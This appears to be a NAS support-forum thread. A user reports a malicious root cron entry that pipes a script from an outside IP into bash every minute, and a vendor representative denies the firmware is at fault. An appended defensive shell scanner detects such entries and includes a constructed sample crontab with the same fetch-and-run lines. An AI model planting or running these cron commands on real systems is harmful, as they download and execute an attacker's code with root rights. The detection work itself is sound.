Hi All,
I noticed the following as my root crontab:
root@NAS:/var/spool/cron/crontabs# cat root
* * * * * wget -q -O - http://195.3.146.118/tr.sh | bash > /dev/null 2>&1
0 12 * * * ntpdate time-a.nist.gov
The crontab was edited at the same time as my last update of the TNAS firmware/software!!! (The cron file date and time is the same as the OS files and folder structures that were updated - this did not happen "after" the update).
This currently appears to be a piece of "attempted" malware that came from TerraMaster during the upgrade process!!
I am now investigating the system and will have to perform more detailed analysis to ensure there are no other infections.
Why would TerraMaster not inform registered customers of this infection?
I will be posting this on larger global forums as I complete my own investigation, but please people - take precautions!!!!!!!
MALWARE from TNAS Upgrade?
Re: MALWARE from TNAS Upgrade?
I am sorry to tell you, obviously, your device is infected by the miner virus. The TerraMaster software update package is unlikely to contain malicious viruses. We have malicious virus protection measures and check methods. It is very likely that your system was infected before the update.
Here is an article as a possible solution for your reference: https://www.linkedin.com/pulse/kinsing- ... amul-patel
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Re: MALWARE from TNAS Upgrade?
@davidroynl
I just got confirmation from our tech team: they checked our recent update packages again and found no malware. You need to stop such nonsense talk immediately; the malware does not come from TNAS updates.
- davidroynl
- Posts: 4
- Joined: 28 Jun 2021, 22:34
Re: MALWARE from TNAS Upgrade?
Interesting for sure that the malware made it to a machine that has no internet access. There has been very little information provided to end users on this "trend" of TNAS devices being infected, and so I do absolutely hold the company partially responsible for multiple reasons, the most of which is lack of communication on a known issue, and secondly, no actions taken to help regular users remove and prevent infection.
Only TNAS has an ability to reach all owners of TNAS devices and rectify this. MOST users are not able to look for infection, or figure out how to clean it from an infected device.
Passing the buck and ignoring the problem is not an appropriate response.
Re: MALWARE from TNAS Upgrade?
Well, the miner malware is a kind of virus; it does not matter whether your TNAS is connected to the internet or not. It spreads in various ways and can get into an environment's network through everyday activities like:
- Exchanging data between devices
- Visiting infected websites (a device can get infected even without downloading files)
- Downloading torrent files or other free software
- Using external storage devices (like USB drives) that were previously connected to an infected computer
- Opening infected email attachments
So I have no idea how you got your TNAS infected. Besides providing you a reference article with a solution, we can do nothing else for you. I think it is fair enough.
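Added example, not part of the thread or any poster's code: a shell check for the kind of cron entry shown in the first post, where a downloaded script is piped straight into a shell. The sample crontab is constructed, 192.0.2.10 is a documentation address standing in for a real host, and the `/etc/crontab` and `/etc/cron.d` paths are assumed common Linux defaults.

```shell
#!/bin/sh
# Flag cron entries that download something with wget/curl and pipe it
# directly into a shell interpreter (sh, bash, dash, zsh, ksh).

# ERE: non-comment line, fetch tool, then a pipe into a shell binary.
PATTERN='^([^#]*[^[:alnum:]_#])?(wget|curl)[[:space:]][^|]*[|][[:space:]]*(/[^[:space:]]*/)?(ba|da|z|k)?sh([[:space:];]|$)'

# scan_crontab FILE...
# Prints "file:lineno:entry" for each hit; returns 0 if any hit, 1 if none.
scan_crontab() {
    rc=1
    for f in "$@"; do
        # Skip unexpanded globs, directories and unreadable files.
        [ -f "$f" ] && [ -r "$f" ] || continue
        # /dev/null as an extra operand makes grep print the file name.
        if grep -nE "$PATTERN" "$f" /dev/null; then
            rc=0
        fi
    done
    return "$rc"
}

# write_sample FILE: constructed crontab for trying the scanner offline.
write_sample() {
    cat > "$1" <<'EOF'
# m h dom mon dow command
* * * * * wget -q -O - http://192.0.2.10/tr.sh | bash > /dev/null 2>&1
0 12 * * * ntpdate time-a.nist.gov
# curl http://192.0.2.10/x.sh | sh
30 3 * * * curl -fsS http://192.0.2.10/x.sh | /bin/sh
15 4 * * * wget -q -O /tmp/list.txt http://192.0.2.10/list.txt
EOF
}

# On a live system (run as root so every user's crontab is readable):
#   scan_crontab /var/spool/cron/crontabs/* /etc/crontab /etc/cron.d/*
```

A hit only shows how the job is relaunched; the entry's file timestamp and whatever the job already fetched still need to be examined separately.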